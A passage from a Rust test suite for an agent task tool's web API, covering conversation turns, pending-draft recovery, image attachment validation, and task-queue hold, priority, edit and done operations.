5821 Queue::at(home.path().join("queue")),
5822 Questions::at(home.path().join("questions")),
5823 talks.clone(),
5824 home.path().join("runs"),
5825 home.path().to_path_buf(),
5826 repo.clone(),
5827 )
5828 .with_worktrees_root(home.path().join("wt")),
5829 );
5830 let cfg = config_for(&repo).await.expect("discover config");
5831
5832 for attempt in 0..3u32 {
5833 let talk = talk::begin(&talks, &cfg, repo.clone(), None).expect("begin talk");
5834 let id = talk.id.clone();
5835 let turn_guard = ui
5838 .begin_talk_turn(&id)
5839 .expect("claim the turn")
5840 .expect("a fresh talk owes nobody a turn");
5841
5842 let (reached_tx, reached_rx) = tokio::sync::oneshot::channel();
5843 let (release_tx, release_rx) = std::sync::mpsc::channel();
5844 ui.set_busy_queue_gate(BusyQueueGate {
5845 reached: reached_tx,
5846 release: release_rx,
5847 });
5848
5849 let handler = tokio::spawn(talk_say(
5850 State(Arc::clone(&ui)),
5851 Path(id.clone()),
5852 Ok(Json(NewTalkTurn {
5853 text: "what does the queue module do?".to_owned(),
5854 attachments: Vec::new(),
5855 })),
5856 ));
5857
5858 tokio::time::timeout(Duration::from_secs(5), reached_rx)
5863 .await
5864 .unwrap_or_else(|_| {
5865 panic!(
5866 "attempt {attempt}: talk {id} never reached the busy branch's queue write"
5867 )
5868 })
5869 .expect("the busy branch dropped the gate without using it");
5870
5871 let running = talks.get(&id).expect("reload talk");
5878 drain_loop(running, talks.clone(), cfg.clone(), id.clone(), turn_guard).await;
5879
5880 handler.abort();
5884 let _ = handler.await;
5885
5886 let _ = release_tx.send(());
5892
5893 let mut fresh = talks.get(&id).expect("reload talk");
5896 for _ in 0..SETTLE_STEPS {
5897 if fresh.pending.is_empty() && fresh.turns.len() == 2 {
5898 break;
5899 }
5900 tokio::time::sleep(Duration::from_millis(10)).await;
5901 fresh = talks.get(&id).expect("reload talk");
5902 }
5903 assert!(
5904 fresh.pending.is_empty() && fresh.turns.len() == 2,
5905 "attempt {attempt}: talk {id} left the operator's text queued \
5906 with no drainer - the reclaimed turn was dropped along with \
5907 the handler future (pending {:?}, {} turns)",
5908 fresh.pending,
5909 fresh.turns.len()
5910 );
5911 }
5912 }
5913
5914 #[tokio::test]
5915 async fn editing_a_recovered_pending_draft_restarts_its_drain_once() {
5916 let (_tmp, _repo, f) = talk_fixture().await;
5917 let id = f.post("/api/talks", None).await.json()["id"]
5918 .as_str()
5919 .expect("id")
5920 .to_owned();
5921 let store = f.talks();
5922 let mut recovered = store.get(&id).expect("opened talk");
5923 talk::queue(&mut recovered, &store, "saved before restart", Vec::new())
5924 .expect("persist pending draft without a live turn");
5925
5926 let edited = f
5927 .post(
5928 &format!("/api/talks/{id}/pending/edit"),
5929 Some(r#"{"text":"corrected","expected_text":"saved before restart","expected_attachments":[]}"#),
5930 )
5931 .await;
5932 assert_eq!(edited.status, 200, "{}", edited.body);
5933 assert!(edited.json()["thinking"].as_bool().unwrap());
5934
5935 let mut detail = f.get(&format!("/api/talks/{id}")).await.json();
5936 for _ in 0..SETTLE_STEPS {
5937 if detail["turns"].as_array().expect("turns").len() == 2 {
5938 break;
5939 }
5940 tokio::time::sleep(Duration::from_millis(10)).await;
5941 detail = f.get(&format!("/api/talks/{id}")).await.json();
5942 }
5943 let turns = detail["turns"].as_array().expect("turns");
5944 assert_eq!(
5945 turns.len(),
5946 2,
5947 "the recovered draft must run once: {detail}"
5948 );
5949 assert_eq!(turns[0]["body"], "corrected");
5950 assert_eq!(detail["pending"], "");
5951 }
5952
5953 #[tokio::test]
5954 async fn recovered_pending_requires_explicit_resume_and_duplicate_resume_runs_once() {
5955 let tmp = TempDir::new().expect("tempdir");
5956 let repo = tmp.path().join("repo");
5957 std::fs::create_dir_all(&repo).expect("repo dir");
5958 std::fs::write(repo.join("magi.toml"), SLOW_MOCK_AGENT_TOML).expect("write config");
5959 let f = Fixture::with_repo(repo).await;
5960 let id = f.post("/api/talks", None).await.json()["id"]
5961 .as_str()
5962 .expect("id")
5963 .to_owned();
5964 let store = f.talks();
5965 let mut recovered = store.get(&id).expect("opened talk");
5966 talk::queue(&mut recovered, &store, "saved before restart", Vec::new())
5967 .expect("persist pending draft without a live turn");
5968
5969 let refused = f
5970 .post(
5971 &format!("/api/talks/{id}/say"),
5972 Some(r#"{"text":"new message"}"#),
5973 )
5974 .await;
5975 assert_eq!(refused.status, 409, "{}", refused.body);
5976 assert!(refused.body.contains("resume"), "{}", refused.body);
5977 let saved = store.get(&id).expect("draft remains after refusal");
5978 assert!(saved.turns.is_empty());
5979 assert_eq!(saved.pending, "saved before restart");
5980
5981 let say_path = format!("/api/talks/{id}/say");
5982 let (first, second) = tokio::join!(
5983 f.post(&say_path, Some(r#"{"text":"concurrent one"}"#)),
5984 f.post(&say_path, Some(r#"{"text":"concurrent two"}"#)),
5985 );
5986 assert_eq!(first.status, 409, "{}", first.body);
5987 assert_eq!(second.status, 409, "{}", second.body);
5988 let saved = store
5989 .get(&id)
5990 .expect("draft remains after concurrent refusals");
5991 assert!(saved.turns.is_empty());
5992 assert_eq!(saved.pending, "saved before restart");
5993
5994 let resumed = f
5995 .post(&format!("/api/talks/{id}/pending/resume"), None)
5996 .await;
5997 assert_eq!(resumed.status, 202, "{}", resumed.body);
5998 let duplicate = f
5999 .post(&format!("/api/talks/{id}/pending/resume"), None)
6000 .await;
6001 assert_eq!(duplicate.status, 409, "{}", duplicate.body);
6002
6003 for _ in 0..SETTLE_STEPS {
6004 if store.get(&id).expect("talk").turns.len() == 2 {
6005 break;
6006 }
6007 tokio::time::sleep(Duration::from_millis(10)).await;
6008 }
6009 let finished = store.get(&id).expect("finished talk");
6010 assert_eq!(finished.turns.len(), 2, "{finished:?}");
6011 assert_eq!(finished.turns[0].body, "saved before restart");
6012 assert!(finished.pending.is_empty());
6013 }
6014
6015 #[tokio::test]
6016 async fn an_image_only_recovered_draft_resumes_without_text() {
6017 let (_tmp, _repo, f) = talk_fixture().await;
6018 let id = f.post("/api/talks", None).await.json()["id"]
6019 .as_str()
6020 .expect("id")
6021 .to_owned();
6022 let uploaded = f
6023 .post_bytes(
6024 &format!("/api/talks/{id}/attachments"),
6025 &[("Content-Type", "image/png"), ("X-Filename", "saved.png")],
6026 PNG_BYTES,
6027 )
6028 .await;
6029 assert_eq!(uploaded.status, 201, "{}", uploaded.body);
6030 let attachment = f
6031 .talks()
6032 .attachment_meta(&id, uploaded.json()["id"].as_str().expect("attachment id"))
6033 .expect("attachment metadata")
6034 .expect("stored attachment");
6035 let store = f.talks();
6036 let mut recovered = store.get(&id).expect("opened talk");
6037 talk::queue(&mut recovered, &store, "", vec![attachment]).expect("queue image only");
6038
6039 let resumed = f
6040 .post(&format!("/api/talks/{id}/pending/resume"), None)
6041 .await;
6042 assert_eq!(resumed.status, 202, "{}", resumed.body);
6043 for _ in 0..SETTLE_STEPS {
6044 if store.get(&id).expect("talk").turns.len() == 2 {
6045 break;
6046 }
6047 tokio::time::sleep(Duration::from_millis(10)).await;
6048 }
6049 let finished = store.get(&id).expect("finished talk");
6050 assert_eq!(finished.turns.len(), 2, "{finished:?}");
6051 assert!(finished.turns[0].body.is_empty());
6052 assert_eq!(finished.turns[0].attachments.len(), 1);
6053 assert!(finished.pending_attachments.is_empty());
6054 }
6055
6056 #[tokio::test]
6057 async fn closed_talk_refuses_pending_mutations_without_changing_the_record() {
6058 let (_tmp, _repo, f) = talk_fixture().await;
6059 let id = f.post("/api/talks", None).await.json()["id"]
6060 .as_str()
6061 .expect("id")
6062 .to_owned();
6063 let closed = f.post(&format!("/api/talks/{id}/close"), None).await;
6064 assert_eq!(closed.status, 200, "{}", closed.body);
6065 let before_clear = serde_json::to_value(f.talks().get(&id).expect("closed talk"))
6066 .expect("serialize closed talk");
6067 for (path, body) in [
6068 (format!("/api/talks/{id}/pending/resume"), None),
6069 (
6070 format!("/api/talks/{id}/pending/clear"),
6071 Some(r#"{"expected_text":"","expected_attachments":[]}"#),
6072 ),
6073 (
6074 format!("/api/talks/{id}/pending/edit"),
6075 Some(r#"{"text":"x","expected_text":"","expected_attachments":[]}"#),
6076 ),
6077 (format!("/api/talks/{id}/say"), Some(r#"{"text":"x"}"#)),
6078 ] {
6079 let response = f.post(&path, body).await;
6080 assert_eq!(response.status, 409, "{}", response.body);
6081 }
6082 let after_clear = serde_json::to_value(f.talks().get(&id).expect("closed talk"))
6083 .expect("serialize closed talk");
6084 assert_eq!(
6085 after_clear, before_clear,
6086 "clear must not rewrite a closed talk"
6087 );
6088 }
6089
6090 const SLOW_MOCK_AGENT_TOML: &str = "[[agents]]\nid = \"mock\"\nkind = \"command\"\ncommand = [\"sh\", \"-c\", \"cat >/dev/null && sleep 0.3 && printf ok\"]\n";
6093
6094 #[tokio::test]
6095 async fn talks_report_independent_thinking_claims_and_queue_a_second_message() {
6096 let tmp = TempDir::new().expect("tempdir");
6097 let repo = tmp.path().join("repo");
6098 std::fs::create_dir_all(&repo).expect("repo dir");
6099 std::fs::write(repo.join("magi.toml"), SLOW_MOCK_AGENT_TOML).expect("write config");
6100 let f = Fixture::with_repo(repo).await;
6101 let id_a = f.post("/api/talks", None).await.json()["id"]
6102 .as_str()
6103 .unwrap()
6104 .to_owned();
6105 let id_b = f.post("/api/talks", None).await.json()["id"]
6106 .as_str()
6107 .unwrap()
6108 .to_owned();
6109
6110 let a = f
6111 .post(&format!("/api/talks/{id_a}/say"), Some(r#"{"text":"a"}"#))
6112 .await;
6113 assert_eq!(a.status, 202, "{}", a.body);
6114 assert_eq!(a.json()["thinking"], true);
6115 let b = f
6116 .post(&format!("/api/talks/{id_b}/say"), Some(r#"{"text":"b"}"#))
6117 .await;
6118 assert_eq!(b.status, 202, "{}", b.body);
6119 assert_eq!(b.json()["thinking"], true);
6120
6121 let listed = f.get("/api/talks").await.json();
6122 for id in [&id_a, &id_b] {
6123 let view = listed
6124 .as_array()
6125 .unwrap()
6126 .iter()
6127 .find(|talk| talk["id"] == *id)
6128 .unwrap();
6129 assert_eq!(view["thinking"], true, "{listed}");
6130 }
6131 let repeated = f
6132 .post(
6133 &format!("/api/talks/{id_a}/say"),
6134 Some(r#"{"text":"again"}"#),
6135 )
6136 .await;
6137 assert_eq!(repeated.status, 202, "{}", repeated.body);
6138 assert_eq!(repeated.json()["pending"], "again");
6139 }
6140
6141 const PNG_BYTES: &[u8] = b"\x89PNG\r\n\x1a\n\x00\x00\x00\x0dIHDR\x00\x00\x00\x01";
6144
6145 #[tokio::test]
6146 async fn a_png_attachment_upload_is_201_and_get_returns_it_with_nosniff() {
6147 let f = Fixture::start().await;
6148 let id = seed_talk(&f, "20260905-000000-a1b2", "open");
6149
6150 let res = f
6151 .post_bytes(
6152 &format!("/api/talks/{id}/attachments"),
6153 &[("Content-Type", "image/png"), ("X-Filename", "shot.png")],
6154 PNG_BYTES,
6155 )
6156 .await;
6157 assert_eq!(res.status, 201, "{}", res.body);
6158 let body = res.json();
6159 assert_eq!(body["name"], "shot.png");
6160 assert_eq!(body["mime"], "image/png");
6161 assert_eq!(body["bytes"], PNG_BYTES.len());
6162 let att_id = body["id"].as_str().expect("id").to_owned();
6163 assert_eq!(
6164 att_id.len(),
6165 32,
6166 "the id must never be a client-suppliable path: {att_id}"
6167 );
6168
6169 let got = f
6170 .get(&format!("/api/talks/{id}/attachments/{att_id}"))
6171 .await;
6172 assert_eq!(got.status, 200, "{}", got.body);
6173 assert_eq!(got.header("content-type"), Some("image/png"));
6174 assert_eq!(got.header("x-content-type-options"), Some("nosniff"));
6175 assert_eq!(got.bytes, PNG_BYTES);
6176 }
6177
6178 #[tokio::test]
6179 async fn an_svg_a_text_file_and_an_oversized_upload_are_all_4xx() {
6180 let f = Fixture::start().await;
6181 let id = seed_talk(&f, "20260905-000000-c3d4", "open");
6182
6183 let svg = f
6186 .post_bytes(
6187 &format!("/api/talks/{id}/attachments"),
6188 &[("Content-Type", "image/svg+xml")],
6189 b"<svg xmlns=\"http://www.w3.org/2000/svg\"></svg>",
6190 )
6191 .await;
6192 assert!(
6193 (400..500).contains(&svg.status),
6194 "svg must be refused: {} {}",
6195 svg.status,
6196 svg.body
6197 );
6198 assert!(svg.body.contains("SVG"), "{}", svg.body);
6199
6200 let text = f
6201 .post_bytes(
6202 &format!("/api/talks/{id}/attachments"),
6203 &[("Content-Type", "text/plain")],
6204 b"just some text",
6205 )
6206 .await;
6207 assert!(
6208 (400..500).contains(&text.status),
6209 "an unlisted type must be refused: {} {}",
6210 text.status,
6211 text.body
6212 );
6213
6214 let oversized = vec![0u8; ATTACHMENT_MAX_BYTES + 1];
6217 let big = f
6218 .post_bytes(
6219 &format!("/api/talks/{id}/attachments"),
6220 &[("Content-Type", "image/png")],
6221 &oversized,
6222 )
6223 .await;
6224 assert_eq!(
6225 big.status,
6226 StatusCode::PAYLOAD_TOO_LARGE.as_u16(),
6227 "{}",
6228 big.body
6229 );
6230 }
6231
6232 #[tokio::test]
6233 async fn a_mislabeled_upload_is_refused_even_though_the_declared_type_is_on_the_whitelist() {
6234 let f = Fixture::start().await;
6235 let id = seed_talk(&f, "20260905-000000-d4e5", "open");
6236
6237 let res = f
6240 .post_bytes(
6241 &format!("/api/talks/{id}/attachments"),
6242 &[("Content-Type", "image/png")],
6243 b"<html>not a picture</html>",
6244 )
6245 .await;
6246 assert!((400..500).contains(&res.status), "{}", res.body);
6247 }
6248
6249 #[tokio::test]
6250 async fn an_unknown_attachment_id_is_a_404() {
6251 let f = Fixture::start().await;
6252 let id = seed_talk(&f, "20260905-000000-e5f6", "open");
6253
6254 let res = f
6255 .get(&format!("/api/talks/{id}/attachments/{}", "0".repeat(32)))
6256 .await;
6257 assert_eq!(res.status, 404, "{}", res.body);
6258 }
6259
6260 #[tokio::test]
6261 async fn talk_say_with_only_an_attachment_and_no_body_is_accepted_and_persists() {
6262 let f = Fixture::start().await;
6263 let id = seed_talk(&f, "20260905-000000-f6a7", "open");
6264
6265 let uploaded = f
6266 .post_bytes(
6267 &format!("/api/talks/{id}/attachments"),
6268 &[("Content-Type", "image/png"), ("X-Filename", "shot.png")],
6269 PNG_BYTES,
6270 )
6271 .await;
6272 assert_eq!(uploaded.status, 201, "{}", uploaded.body);
6273 let att_id = uploaded.json()["id"].as_str().expect("id").to_owned();
6274
6275 let res = f
6276 .post(
6277 &format!("/api/talks/{id}/say"),
6278 Some(&format!(r#"{{"text":"","attachments":["{att_id}"]}}"#)),
6279 )
6280 .await;
6281 assert_eq!(res.status, 202, "{}", res.body);
6282 let queued = res.json();
6283 let turns = queued["turns"].as_array().expect("turns array");
6284 assert_eq!(
6285 turns.len(),
6286 1,
6287 "an empty body with an attachment is still a turn: {queued}"
6288 );
6289 assert_eq!(turns[0]["who"], "operator");
6290 assert_eq!(turns[0]["body"], "");
6291 let atts = turns[0]["attachments"]
6292 .as_array()
6293 .expect("attachments array");
6294 assert_eq!(atts.len(), 1);
6295 assert_eq!(atts[0]["id"], att_id);
6296 assert_eq!(atts[0]["mime"], "image/png");
6297
6298 let on_disk = f.talks().get(&id).expect("get");
6301 assert_eq!(on_disk.turns[0].attachments.len(), 1);
6302 assert_eq!(on_disk.turns[0].attachments[0].id, att_id);
6303 }
6304
6305 #[tokio::test]
6306 async fn saying_with_an_unknown_attachment_id_is_a_4xx_and_records_nothing() {
6307 let f = Fixture::start().await;
6308 let id = seed_talk(&f, "20260905-000000-a7b8", "open");
6309
6310 let res = f
6311 .post(
6312 &format!("/api/talks/{id}/say"),
6313 Some(&format!(
6314 r#"{{"text":"hi","attachments":["{}"]}}"#,
6315 "a".repeat(32)
6316 )),
6317 )
6318 .await;
6319 assert!((400..500).contains(&res.status), "{}", res.body);
6320 assert!(res.body.contains("unknown attachment"), "{}", res.body);
6321
6322 let on_disk = f.talks().get(&id).expect("get");
6323 assert!(
6324 on_disk.turns.is_empty(),
6325 "a rejected attachment id must not partially record the turn: {:?}",
6326 on_disk.turns
6327 );
6328 }
6329
6330 #[tokio::test]
6331 async fn talk_close_makes_the_talk_refuse_further_turns() {
6332 let f = Fixture::start().await;
6333 let id = seed_talk(&f, "20260904-014455-cd34", "open");
6334
6335 let closed = f.post(&format!("/api/talks/{id}/close"), None).await;
6336 assert_eq!(closed.status, 200, "{}", closed.body);
6337 assert_eq!(closed.json()["status"], "closed");
6338
6339 let closed_again = f.post(&format!("/api/talks/{id}/close"), None).await;
6341 assert_eq!(closed_again.status, 200);
6342 assert_eq!(closed_again.json()["status"], "closed");
6343
6344 let said = f
6345 .post(
6346 &format!("/api/talks/{id}/say"),
6347 Some(r#"{"text":"too late"}"#),
6348 )
6349 .await;
6350 assert_eq!(said.status, 409, "{}", said.body);
6351 }
6352
6353 #[tokio::test]
6354 async fn talk_reopen_lets_a_closed_talk_take_turns_again_and_is_idempotent() {
6355 let (_tmp, _repo, f) = talk_fixture().await;
6356 let id = f.post("/api/talks", None).await.json()["id"]
6357 .as_str()
6358 .expect("id")
6359 .to_owned();
6360 let closed = f.post(&format!("/api/talks/{id}/close"), None).await;
6361 assert_eq!(closed.status, 200, "{}", closed.body);
6362
6363 let reopened = f.post(&format!("/api/talks/{id}/reopen"), None).await;
6364 assert_eq!(reopened.status, 200, "{}", reopened.body);
6365 assert_eq!(reopened.json()["status"], "open");
6366
6367 let reopened_again = f.post(&format!("/api/talks/{id}/reopen"), None).await;
6369 assert_eq!(reopened_again.status, 200);
6370 assert_eq!(reopened_again.json()["status"], "open");
6371
6372 let said = f
6373 .post(
6374 &format!("/api/talks/{id}/say"),
6375 Some(r#"{"text":"still there?"}"#),
6376 )
6377 .await;
6378 assert_eq!(
6379 said.status, 202,
6380 "a reopened talk accepts turns again: {}",
6381 said.body
6382 );
6383 }
6384
6385 #[tokio::test]
6386 async fn talk_reopen_on_an_unknown_id_is_404() {
6387 let f = Fixture::start().await;
6388 let res = f.post("/api/talks/nonexistent-id/reopen", None).await;
6389 assert_eq!(res.status, 404, "{}", res.body);
6390 }
6391
6392 #[tokio::test]
6393 async fn talk_delete_removes_the_talk_from_disk_and_the_list() {
6394 let f = Fixture::start().await;
6395 let id = seed_talk(&f, "20260904-014455-ef56", "closed");
6396
6397 let deleted = f.delete(&format!("/api/talks/{id}")).await;
6398 assert_eq!(deleted.status, 204, "{}", deleted.body);
6399
6400 let after = f.get(&format!("/api/talks/{id}")).await;
6401 assert_eq!(after.status, 404, "{}", after.body);
6402
6403 let listed = f.get("/api/talks").await.json();
6404 assert!(
6405 listed.as_array().unwrap().iter().all(|t| t["id"] != id),
6406 "a deleted talk must not linger in the list: {listed}"
6407 );
6408 }
6409
6410 #[tokio::test]
6411 async fn talk_delete_on_an_unknown_id_is_404() {
6412 let f = Fixture::start().await;
6413 let res = f.delete("/api/talks/nonexistent-id").await;
6414 assert_eq!(res.status, 404, "{}", res.body);
6415 }
6416
6417 #[tokio::test]
6418 async fn holding_then_releasing_returns_a_task_to_the_loop_with_a_fresh_budget() {
6419 let f = Fixture::start().await;
6420 let queue = f.queue();
6421 let mut task = Task::new(
6422 "spent".to_owned(),
6423 "Try again".to_owned(),
6424 PathBuf::from("/repo/magi"),
6425 Source::Human,
6426 );
6427 task.start("20260902-140502-bbbb".to_owned());
6428 task.fail("agent gave up", 9);
6429 queue.put(&mut task).expect("file the task");
6430
6431 let held = f.post(&format!("/api/queue/{}/hold", task.id), None).await;
6432 assert_eq!(held.status, 200);
6433 assert_eq!(held.json()["status_str"], "held");
6434
6435 let released = f
6436 .post(&format!("/api/queue/{}/release", task.id), None)
6437 .await;
6438 assert_eq!(released.status, 200);
6439 assert_eq!(released.json()["status_str"], "queued");
6440 assert_eq!(
6441 released.json()["attempts"],
6442 0,
6443 "release is a real second chance, not an instant re-hold"
6444 );
6445 assert_eq!(
6446 queue.get(&task.id).expect("reload").status,
6447 TaskStatus::Queued,
6448 "the change is on disk, not only in the reply"
6449 );
6450 assert!(
6451 !f.home
6452 .path()
6453 .join("queue")
6454 .join(format!("{}.lock", task.id))
6455 .exists(),
6456 "the claim the mutation took is released again"
6457 );
6458 }
6459
6460 #[tokio::test]
6461 async fn a_task_a_daemon_is_running_cannot_be_changed_from_the_phone() {
6462 let f = Fixture::start().await;
6463 let queue = f.queue();
6464 let mut task = Task::new(
6465 "busy".to_owned(),
6466 "Running right now".to_owned(),
6467 PathBuf::from("/repo/magi"),
6468 Source::Human,
6469 );
6470 queue.put(&mut task).expect("file the task");
6471 let _claim = queue.claim(&task.id).expect("stand in for the daemon");
6472
6473 let res = f.post(&format!("/api/queue/{}/hold", task.id), None).await;
6474
6475 assert_eq!(res.status, 409);
6476 assert_eq!(
6477 queue.get(&task.id).expect("reload").status,
6478 TaskStatus::Queued,
6479 "the refused hold changed nothing"
6480 );
6481 }
6482
6483 #[tokio::test]
6484 async fn holding_with_a_reason_reads_back_from_show_and_the_card_and_release_clears_it() {
6485 let f = Fixture::start().await;
6486 let queue = f.queue();
6487 let mut task = Task::new(
6488 "waiting on the migration".to_owned(),
6489 "Do the thing".to_owned(),
6490 PathBuf::from("/repo/magi"),
6491 Source::Human,
6492 );
6493 queue.put(&mut task).expect("file the task");
6494
6495 let held = f
6496 .post(
6497 &format!("/api/queue/{}/hold", task.id),
6498 Some(r#"{"reason":"waiting for 20260101-000000-aaaa to land"}"#),
6499 )
6500 .await;
6501 assert_eq!(held.status, 200, "{}", held.body);
6502 assert_eq!(held.json()["status_str"], "held");
6503 assert_eq!(
6504 held.json()["hold_reason"],
6505 "waiting for 20260101-000000-aaaa to land"
6506 );
6507
6508 let listed = f.get("/api/queue").await.json();
6509 assert_eq!(
6510 listed[0]["hold_reason"], "waiting for 20260101-000000-aaaa to land",
6511 "the card reads the reason off the same list route"
6512 );
6513
6514 let mut plain = Task::new(
6517 "no reason given".to_owned(),
6518 "Do another thing".to_owned(),
6519 PathBuf::from("/repo/magi"),
6520 Source::Human,
6521 );
6522 queue.put(&mut plain).expect("file the task");
6523 let held_plain = f.post(&format!("/api/queue/{}/hold", plain.id), None).await;
6524 assert_eq!(held_plain.status, 200, "{}", held_plain.body);
6525 assert!(held_plain.json()["hold_reason"].is_null());
6526
6527 let released = f
6528 .post(&format!("/api/queue/{}/release", task.id), None)
6529 .await;
6530 assert_eq!(released.status, 200);
6531 assert!(
6532 released.json()["hold_reason"].is_null(),
6533 "a release must clear the reason so the next hold does not inherit it"
6534 );
6535 }
6536
6537 #[tokio::test]
6538 async fn priority_can_be_raised_from_the_phone_and_moves_the_task_ahead() {
6539 let f = Fixture::start().await;
6540 let queue = f.queue();
6541 let mut older = Task::new(
6542 "filed first".to_owned(),
6543 "x".to_owned(),
6544 PathBuf::from("/repo/magi"),
6545 Source::Human,
6546 );
6547 older.id = "20260101-000001-aaaa".to_owned();
6548 let mut newer = Task::new(
6549 "filed second".to_owned(),
6550 "x".to_owned(),
6551 PathBuf::from("/repo/magi"),
6552 Source::Human,
6553 );
6554 newer.id = "20260101-000002-bbbb".to_owned();
6555 queue.put(&mut older).expect("file older");
6556 queue.put(&mut newer).expect("file newer");
6557
6558 let before = f.get("/api/queue").await.json();
6561 assert_eq!(before[0]["id"], newer.id);
6562 assert_eq!(before[1]["id"], older.id);
6563
6564 let raised = f
6568 .post(
6569 &format!("/api/queue/{}/priority", older.id),
6570 Some(r#"{"priority":10}"#),
6571 )
6572 .await;
6573 assert_eq!(raised.status, 200, "{}", raised.body);
6574 assert_eq!(raised.json()["priority"], 10);
6575
6576 let after = f.get("/api/queue").await.json();
6577 let names: Vec<&str> = after
6578 .as_array()
6579 .unwrap()
6580 .iter()
6581 .map(|t| t["id"].as_str().unwrap())
6582 .collect();
6583 assert_eq!(names[0], older.id, "the raised task now sorts first");
6587 }
6588
6589 #[tokio::test]
6590 async fn priority_is_refused_on_a_running_task_with_a_reason_in_the_body() {
6591 let f = Fixture::start().await;
6592 let queue = f.queue();
6593 let mut task = Task::new(
6594 "in flight".to_owned(),
6595 "x".to_owned(),
6596 PathBuf::from("/repo/magi"),
6597 Source::Human,
6598 );
6599 task.start("20260902-140502-bbbb".to_owned());
6600 queue.put(&mut task).expect("file the task");
6601
6602 let res = f
6603 .post(
6604 &format!("/api/queue/{}/priority", task.id),
6605 Some(r#"{"priority":9}"#),
6606 )
6607 .await;
6608 assert_eq!(res.status, 400, "{}", res.body);
6609 assert!(
6610 res.json()["error"]
6611 .as_str()
6612 .is_some_and(|e| e.contains("running")),
6613 "{}",
6614 res.body
6615 );
6616 assert_eq!(
6617 queue.get(&task.id).expect("reload").priority,
6618 0,
6619 "the refused write must not partially apply"
6620 );
6621 }
6622
6623 #[tokio::test]
6624 async fn editing_replaces_title_and_instruction_and_keeps_id_created_at_source_and_runs() {
6625 let f = Fixture::start().await;
6626 let queue = f.queue();
6627 let mut task = Task::new(
6628 "old title".to_owned(),
6629 "old instruction".to_owned(),
6630 PathBuf::from("/repo/magi"),
6631 Source::Agent {
6632 run: "20260101-000000-beef".to_owned(),
6633 node: "implement".to_owned(),
6634 },
6635 );
6636 task.runs.push("20260101-000000-beef".to_owned());
6637 queue.put(&mut task).expect("file the task");
6638 let created_at = task.created_at;
6639
6640 let edited = f
6641 .post(
6642 &format!("/api/queue/{}/edit", task.id),
6643 Some(r#"{"title":"new title","instruction":"new instruction"}"#),
6644 )
6645 .await;
6646 assert_eq!(edited.status, 200, "{}", edited.body);
6647 let body = edited.json();
6648 assert_eq!(body["title"], "new title");
6649 assert_eq!(body["instruction"], "new instruction");
6650 assert_eq!(body["id"], task.id, "editing must not mint a new id");
6651 assert_eq!(body["created_at"], created_at.to_string());
6652 assert_eq!(
6653 body["source"]["kind"], "agent",
6654 "editing a task an agent filed must not turn it human: {body}"
6655 );
6656 assert_eq!(body["runs"], serde_json::json!(["20260101-000000-beef"]));
6657
6658 let reloaded = queue.get(&task.id).expect("reload");
6659 assert_eq!(reloaded.title, "new title");
6660 assert_eq!(reloaded.instruction, "new instruction");
6661 }
6662
6663 #[tokio::test]
6664 async fn editing_a_running_task_is_refused_with_a_reason_in_the_response() {
6665 let f = Fixture::start().await;
6666 let queue = f.queue();
6667 let mut task = Task::new(
6668 "in flight".to_owned(),
6669 "do not touch".to_owned(),
6670 PathBuf::from("/repo/magi"),
6671 Source::Human,
6672 );
6673 task.start("20260902-140502-bbbb".to_owned());
6674 queue.put(&mut task).expect("file the task");
6675
6676 let res = f
6677 .post(
6678 &format!("/api/queue/{}/edit", task.id),
6679 Some(r#"{"title":"x","instruction":"y"}"#),
6680 )
6681 .await;
6682 assert_eq!(res.status, 400, "{}", res.body);
6683 assert!(
6684 res.json()["error"]
6685 .as_str()
6686 .is_some_and(|e| e.contains("running")),
6687 "{}",
6688 res.body
6689 );
6690 assert_eq!(
6691 queue.get(&task.id).expect("reload").instruction,
6692 "do not touch",
6693 "the refused edit must not change the file"
6694 );
6695 }
6696
6697 #[tokio::test]
6698 async fn a_claimed_task_refuses_priority_and_edit_the_same_way_it_refuses_hold() {
6699 let f = Fixture::start().await;
6700 let queue = f.queue();
6701 let mut task = Task::new(
6702 "busy".to_owned(),
6703 "Running right now".to_owned(),
6704 PathBuf::from("/repo/magi"),
6705 Source::Human,
6706 );
6707 queue.put(&mut task).expect("file the task");
6708 let _claim = queue.claim(&task.id).expect("stand in for the daemon");
6709
6710 let priority = f
6711 .post(
6712 &format!("/api/queue/{}/priority", task.id),
6713 Some(r#"{"priority":9}"#),
6714 )
6715 .await;
6716 assert_eq!(priority.status, 409, "{}", priority.body);
6717
6718 let edit = f
6719 .post(
6720 &format!("/api/queue/{}/edit", task.id),
6721 Some(r#"{"title":"x","instruction":"y"}"#),
6722 )
6723 .await;
6724 assert_eq!(edit.status, 409, "{}", edit.body);
6725 }
6726
6727 #[tokio::test]
6728 async fn done_from_the_phone_keeps_runs_source_and_created_at_unlike_delete() {
6729 let f = Fixture::start().await;
6730 let queue = f.queue();
6731 let mut task = Task::new(
6732 "shipped by hand".to_owned(),
6733 "merged outside the loop".to_owned(),
6734 PathBuf::from("/repo/magi"),
6735 Source::Agent {
6736 run: "20260101-000000-b455".to_owned(),
6737 node: "implement".to_owned(),
6738 },
6739 );
6740 task.runs.push("20260101-000000-b455".to_owned());
6741 task.runs.push("20260101-000000-9af4".to_owned());
6742 queue.put(&mut task).expect("file the task");
6743 let created_at = task.created_at;
6744
6745 let done = f.post(&format!("/api/queue/{}/done", task.id), None).await;
6746 assert_eq!(done.status, 200, "{}", done.body);
6747 assert_eq!(done.json()["status_str"], "done");
6748
6749 let reloaded = queue.get(&task.id).expect("a done task is still on disk");
6750 assert_eq!(
6751 reloaded.runs,
6752 ["20260101-000000-b455", "20260101-000000-9af4"]
6753 );
6754 assert_eq!(
6755 reloaded.source,
6756 Source::Agent {
6757 run: "20260101-000000-b455".to_owned(),
6758 node: "implement".to_owned(),
6759 }
6760 );
6761 assert_eq!(reloaded.created_at, created_at);
6762 }
6763
6764 #[tokio::test]
6765 async fn closing_a_held_task_as_done_from_the_phone_clears_its_hold_reason() {
6766 let f = Fixture::start().await;
6771 let queue = f.queue();
6772 let mut task = Task::new(
6773 "landed while held".to_owned(),
6774 "x".to_owned(),
6775 PathBuf::from("/repo/magi"),
6776 Source::Human,
6777 );
6778 task.hold_manual(Some("waiting on 3ed9".to_owned()));
6779 queue.put(&mut task).expect("file the held task");
6780
6781 let done = f.post(&format!("/api/queue/{}/done", task.id), None).await;
6782 assert_eq!(done.status, 200, "{}", done.body);
6783 assert_eq!(done.json()["status_str"], "done");
6784 assert!(
6785 done.json()["hold_reason"].is_null(),
6786 "a done task cannot still be waiting on something: {}",
6787 done.body
6788 );
6789 }
6790
6791 #[tokio::test]
6792 async fn done_from_the_phone_supersedes_an_earlier_blocked_attempt() {
6793 let f = Fixture::start().await;
6798 let queue = f.queue();
6799 let runs = f.runs();
